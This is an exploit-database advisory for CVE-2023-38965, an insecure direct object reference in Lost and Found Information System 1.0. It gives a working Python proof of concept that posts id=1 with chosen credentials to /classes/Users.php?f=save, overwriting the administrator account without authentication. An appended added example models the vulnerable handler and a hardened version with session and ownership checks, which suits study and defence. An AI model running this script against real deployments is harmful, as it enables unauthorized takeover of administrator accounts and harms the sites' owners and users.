Headline
Lost And Found Information System 1.0 Insecure Direct Object Reference
Lost and Found Information System version 1.0 suffers from an insecure direct object reference vulnerability that allows for account takeover.
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python p0c :

import argparse
import requests
import time

parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()

url = args.url + '/classes/Users.php?f=save'
data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data)
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")
Related news
CVE-2023-38965: vulnreability-code-review-php/Lost and Found Information System v1.0.txt at main · Or4ngm4n/vulnreability-code-review-php
Lost and Found Information System 1.0 allows account takeover via username and password to a /classes/Users.php?f=save URI.
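
The request to /classes/Users.php?f=save names the account to overwrite in a client-supplied id field, so the fix is a server-side authentication and ownership check before the write. The following Python model is an added example, not the application's code or the exploit author's; the User record, session shape, is_admin flag and function names are assumptions made for illustration.

```python
# Added illustration: a minimal model of a "save user" handler.
# Store layout, session keys and role flag are assumptions, not the app's code.
from dataclasses import dataclass

@dataclass
class User:
    id: int
    username: str
    password: str  # constructed values; a real store keeps only a hash
    is_admin: bool = False

class Forbidden(Exception):
    """Raised when the caller may not modify the requested record."""

def save_user_vulnerable(users, session, form):
    # Trusts the client-supplied id: no login check, no ownership check.
    target = users[int(form["id"])]
    target.username = form["username"]
    target.password = form["password"]
    return target

def save_user_hardened(users, session, form):
    # 1. The caller must map to a real account via the server-side session.
    caller = users.get((session or {}).get("user_id"))
    if caller is None:
        raise Forbidden("authentication required")
    # 2. A missing or empty id means "my own record", never a default account.
    try:
        target_id = int(form.get("id") or caller.id)
    except (TypeError, ValueError):
        raise Forbidden("malformed id")
    # 3. Object-level authorization: own record, or caller is an administrator.
    if target_id != caller.id and not caller.is_admin:
        raise Forbidden("cannot modify another user's account")
    target = users.get(target_id)
    if target is None:
        raise Forbidden("unknown user")
    target.username = form["username"]
    target.password = form["password"]
    return target

def demo_store():
    # Constructed sample accounts: id 1 is the administrator.
    return {
        1: User(1, "admin", "constructed-admin-pw", is_admin=True),
        2: User(2, "staff", "constructed-staff-pw"),
    }
```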